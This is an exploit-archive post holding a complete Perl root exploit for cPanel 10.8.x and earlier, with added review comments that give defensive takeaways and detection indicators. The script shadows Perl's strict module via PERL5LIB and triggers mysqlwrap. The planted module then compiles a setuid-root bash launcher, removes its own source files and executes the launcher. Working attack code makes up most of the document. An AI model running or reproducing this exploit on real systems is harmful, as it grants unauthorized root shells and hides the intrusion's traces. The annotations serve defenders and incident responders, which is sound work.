[D] cPanel <= 10.8.x cpwrap root exploit via mysqladmin [z] 2010-12-23 12:40:29
Posted by: kedans

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] cPanel <= 10.8.x cpwrap root exploit via mysqladmin [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl -w

#- cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# By KedAns
# [D] HaCkErS-StreeT-Team[Z]

# Setup stage: record the two cPanel wrapper paths the script relies on,
# point PERL5LIB at the current directory, and stop unless a compiler and
# both wrappers are executable by the invoking user.
my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
# Current working directory, captured from the external `pwd` command.
my $pwd = `pwd`;

chomp $pwd;
# PERL5LIB prepends a caller-chosen directory to Perl's module search path,
# so modules in that directory shadow the installed ones.
# NOTE(review): the underlying flaw is presumably that the privileged wrapper
# hands this variable unchanged to a Perl program it runs with elevated
# rights -- that code is not visible here; confirm against the vendor advisory.
# Defensive takeaway: privileged wrappers should rebuild the environment from
# an allow-list before exec, and privileged Perl should run in taint mode
# (-T), under which perl ignores PERL5LIB.
$ENV{'PERL5LIB'} = "$pwd";

# Preconditions. The first test means this script, as written, stops on hosts
# where /usr/bin/gcc is not executable by the caller; that restricts this
# particular script only and does not address the environment handling above.
if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

# Patch check: read the cpwrap file line by line and abort with
# "... is patched." if any line contains the string REMOTE_USER.
# NOTE(review): the script treats that string as the marker of a fixed build;
# why the fixed wrapper contains it is not shown here. For triage, verify the
# installed cPanel version against the vendor's advisory rather than relying
# on a string match alone.
open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

# Writes a file named strict.pm into the current directory. Because PERL5LIB
# was pointed at this directory earlier in the script, a Perl program that
# honours PERL5LIB and loads the `strict` pragma finds this file before the
# genuine core module.
#
# The generated file contains five statements that run when it is loaded:
#   1. store a one-line C program (sets real/effective uid and gid to 0, then
#      starts /bin/bash) in $e;
#   2. echo that text into Maildir.c;
#   3. compile it with /usr/bin/gcc into a binary named Maildir;
#   4. chmod 4755 on the binary (setuid bit, world-executable);
#   5. delete Maildir.c and strict.pm.
#
# Detection notes for responders: step 5 removes the source and the shadow
# module, so the lasting artefact is the Maildir binary. Useful indicators are
# a setuid file owned by root inside a user-writable directory, a strict.pm
# outside Perl's own library paths, and gcc executed by root with a user's
# directory as its working directory.
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

# Trigger: invoke mysqlwrap with the DUMPMYSQL argument, discarding stderr.
# The child inherits the PERL5LIB value set earlier in this script.
# NOTE(review): presumably this path reaches a Perl program run with elevated
# privileges via cpwrap, which then loads the planted strict.pm -- that chain
# is inferred from the page title and is not visible in this file.
# Audit hint: process-execution logs showing mysqlwrap started by an
# unprivileged account with PERL5LIB present in its environment are worth
# reviewing on affected versions.
system("$mysqlwrap DUMPMYSQL 2>/dev/null");

# Outcome check: success is judged solely by the existence of a file named
# Maildir in the current directory, which is then executed. Otherwise the
# leftover strict.pm is removed and the script exits with "Failed".
if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# By KedAns-Dz

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --